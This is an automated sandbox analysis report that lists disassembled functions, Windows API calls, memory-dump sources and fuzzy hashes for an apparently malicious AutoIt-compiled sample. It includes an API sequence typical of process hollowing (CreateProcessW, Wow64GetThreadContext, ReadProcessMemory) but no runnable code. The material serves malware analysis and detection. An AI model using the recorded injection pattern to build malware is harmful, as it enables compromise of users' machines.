                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Init_thread_footer
                                  • String ID: CALL
                                  • API String ID: 1385522511-4196123274
                                  • Opcode ID: 10c5c81e4e9c9915444ef390570995228593d36fdf1150a127288e5264ff2caa
                                  • Instruction ID: a83de1c0ddbb1f55da09ca3b049cc7ce9b094ced197fb77d6e3b56522265c655
                                  • Opcode Fuzzy Hash: 10c5c81e4e9c9915444ef390570995228593d36fdf1150a127288e5264ff2caa
                                  • Instruction Fuzzy Hash: 64229B746083019FC716DF14C481A2ABBF5FF86314F28891DF9968B3A6D771E845CB92
                                  Function 003C6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 003C6F6B
                                    • Part of subcall function 00354ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354EFD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: LibraryLoad_wcslen
                                  • String ID: >>>AUTOIT SCRIPT<<<
                                  • API String ID: 3312870042-2806939583
                                  • Opcode ID: 5bc80b0ca8e0fce2270d864d405c813cee72c678e28278a7de9c9379200f2433
                                  • Instruction ID: 8d767745a8982cd4b6c01ff7951574f4e368c0759e986930f8a5d3d2d7479c59
                                  • Opcode Fuzzy Hash: 5bc80b0ca8e0fce2270d864d405c813cee72c678e28278a7de9c9379200f2433
                                  • Instruction Fuzzy Hash: B2B173311086018FCB16EF24C491EAEB7E5AF94314F05895DFC969B272EB30ED49CB92
                                  Function 003C2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID: EA06
                                  • API String ID: 2638373210-3962188686
                                  • Opcode ID: 34dcd97ff764cd777115cd77208089facd104946f09a5be45bd9ba6cd9f9da4e
                                  • Instruction ID: 41c432360c4973df23b3b420c345f2885d0b9abdaf31314ef01a3f7ded5de5c6
                                  • Opcode Fuzzy Hash: 34dcd97ff764cd777115cd77208089facd104946f09a5be45bd9ba6cd9f9da4e
                                  • Instruction Fuzzy Hash: 4C01F5728442187EDF29C7A8C816FEEBBF89B06301F00859EE156D6181E5B8E6088B60
                                  Function 00353837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00353908
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_
                                  • String ID:
                                  • API String ID: 1144537725-0
                                  • Opcode ID: ae1df629881941c57080b6d29695659d4829da3145d7f42411fe7e8b9ae472db
                                  • Instruction ID: 6780ae9b4517d1291474dd7ceb2e6ceda127bb4431018386b434c350c5fbcf80
                                  • Opcode Fuzzy Hash: ae1df629881941c57080b6d29695659d4829da3145d7f42411fe7e8b9ae472db
                                  • Instruction Fuzzy Hash: 083195B0604301DFE722DF24D884B97BBE8FF49749F00092EF99987260D771AA48CB56
                                  Function 00356D9E Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0036CF58,?,?,?), ref: 00356DBA
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0036CF58,?,?,?), ref: 00356DED
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 626452242-0
                                  • Opcode ID: 9b22de5980b71d003a1aed342ced457ac1e77ecc492274552e1a4c5f10811ee3
                                  • Instruction ID: 35428295a64d20be46702d75b9b8009ba44c755c3e3371fdae5de94937db1de8
                                  • Opcode Fuzzy Hash: 9b22de5980b71d003a1aed342ced457ac1e77ecc492274552e1a4c5f10811ee3
                                  • Instruction Fuzzy Hash: 1C01F7713052007FEB2A5769DD4BFAF7AADDB85310F00413DB506DB1E1D9A19C004560
                                  Function 0114129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01141A5B
                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01141AF1
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01141B13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674676334.0000000001140000.00000040.00001000.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1140000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                  • String ID:
                                  • API String ID: 2438371351-0
                                  • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                  • Instruction ID: 558782a6696b8045e672c6d4d1f00d1c979e8c1ba85cbb9066e65779f9b02903
                                  • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                  • Instruction Fuzzy Hash: 4812FE24E24658C7EB24DF64D8507DEB232EF68700F1090E9910DEB7A4E77A5F81CB5A
                                  Function 0036FC70 Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                  • Instruction ID: 43d76bbeb94481f17e9ccd10b7e59a9db5bd730ee2b8461be9afe4c968147474
                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                  • Instruction Fuzzy Hash: D931D175A001099FC71ADF59E480969FBB6FF49300B25C6A5E809CB65AD731EDC1CBD0
                                  Function 00354ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00354E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00354EDD,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354E9C
                                    • Part of subcall function 00354E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00354EAE
                                    • Part of subcall function 00354E90: FreeLibrary.KERNEL32(00000000,?,?,00354EDD,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354EC0
                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354EFD
                                    • Part of subcall function 00354E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00393CDE,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354E62
                                    • Part of subcall function 00354E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00354E74
                                    • Part of subcall function 00354E59: FreeLibrary.KERNEL32(00000000,?,?,00393CDE,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354E87
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressFreeProc
                                  • String ID:
                                  • API String ID: 2632591731-0
                                  • Opcode ID: 5da26dc38734dce881a056473aa0476c1d7528ca58f2c2193cb58f53e455ac36
                                  • Instruction ID: e9d658ca7043bcf1debb724cbd1137b94ee994bfff32fb4c79f9bd8244b7b47c
                                  • Opcode Fuzzy Hash: 5da26dc38734dce881a056473aa0476c1d7528ca58f2c2193cb58f53e455ac36
                                  • Instruction Fuzzy Hash: A511E731610305ABCF2AAB64DC13FAD77A59F40716F10842DF942AE1E1EE709E899B50
                                  Function 00388402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: __wsopen_s
                                  • String ID:
                                  • API String ID: 3347428461-0
                                  • Opcode ID: edd7959140ccf0488852761709f848ac641d5ad76e1b27488c97b97f2cd28f01
                                  • Instruction ID: 34b33697e7d6c7efc8cd2702e9b9610add599caee3a0829f1b60a39f6902919e
                                  • Opcode Fuzzy Hash: edd7959140ccf0488852761709f848ac641d5ad76e1b27488c97b97f2cd28f01
                                  • Instruction Fuzzy Hash: D2112E7690420AAFCF16DF59E94199E7BF5EF48314F114099FC08AB312DB31DA11CB65
                                  Function 00385000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00384C7D: RtlAllocateHeap.NTDLL(00000008,00351129,00000000,?,00382E29,00000001,00000364,?,?,?,0037F2DE,00383863,00421444,?,0036FDF5,?), ref: 00384CBE
                                  • _free.LIBCMT ref: 0038506C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                  • Instruction ID: 14f3fa36e242afb329abb8a3dff25ee26a32c23837f95d10afcd5db895494774
                                  • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                  • Instruction Fuzzy Hash: 32014EB22047056BE3329F65D84199AFBECFB85370F25055DE184872C0EB306805C774
                                  Function 0037E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                  • Instruction ID: 2df82850b8159cd240cd6ab0d95097f167832a5604a5c4ade06f5f008888dcd9
                                  • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                  • Instruction Fuzzy Hash: DDF02832510B14AAC7333A799C05B5B339C9F56330F118795F9299B1D2DB7CD80187A5
                                  Function 00384C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,00351129,00000000,?,00382E29,00000001,00000364,?,?,?,0037F2DE,00383863,00421444,?,0036FDF5,?), ref: 00384CBE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 1b67ef5d7e73442fa27d5f5aecd58cdf5395c536652cccf5164809c163245959
                                  • Instruction ID: 5d66c048a9ec8f6a207881f0d26903ef4721b44375c809c8aeeb9148e2def454
                                  • Opcode Fuzzy Hash: 1b67ef5d7e73442fa27d5f5aecd58cdf5395c536652cccf5164809c163245959
                                  • Instruction Fuzzy Hash: 2AF0B43160232677DB337F629C05B5A77ACBF41BA0B1681A5F819AA991CB30D80147A0
                                  Function 00383820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,00421444,?,0036FDF5,?,?,0035A976,00000010,00421440,003513FC,?,003513C6,?,00351129), ref: 00383852
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 9718dc00705d3eac5fe179e220f83ea452900172d2011a2c5f8d42229eacc7ab
                                  • Instruction ID: 9f6b5a7a9bcd8f6caf845253fb68c523ef5e9ee6b0b1882afbbaa51daf34c57e
                                  • Opcode Fuzzy Hash: 9718dc00705d3eac5fe179e220f83ea452900172d2011a2c5f8d42229eacc7ab
                                  • Instruction Fuzzy Hash: 9AE065312013245BE63337669C05B9A364DAF42FB0F1641A5FC19AAA91DB25EE0583E1
                                  Function 00354F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  APIs
                                  • FreeLibrary.KERNEL32(?,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354F6D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: 67d4e41380d49dbc46d99b9d874cc86d5a788b4131226d15bb0a83d7e31036f7
                                  • Instruction ID: 15c15cdd26d4839fb4b17575a0fbba4536d60c165a99b4257acc75d65654540e
                                  • Opcode Fuzzy Hash: 67d4e41380d49dbc46d99b9d874cc86d5a788b4131226d15bb0a83d7e31036f7
                                  • Instruction Fuzzy Hash: 24F03071105751CFDB3A9F68D490C56B7F4AF1431E321897EE5DA86621C7319888DF50
                                  Function 00352DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00352DC4
                                    • Part of subcall function 00356B57: _wcslen.LIBCMT ref: 00356B6A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: LongNamePath_wcslen
                                  • String ID:
                                  • API String ID: 541455249-0
                                  • Opcode ID: 9d85ac82d14453daba4740329b130d8fd6dd6457e561da42a99ffd671f9357d0
                                  • Instruction ID: b66d70d25883555c2e41b0a16aedaee6650c8f90582e3b898a7600e9ba069280
                                  • Opcode Fuzzy Hash: 9d85ac82d14453daba4740329b130d8fd6dd6457e561da42a99ffd671f9357d0
                                  • Instruction Fuzzy Hash: C2E0CD726001245BCB219258DC06FEA77DDDFC8790F040171FD09EB258D970AD848550
                                  Function 003C2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
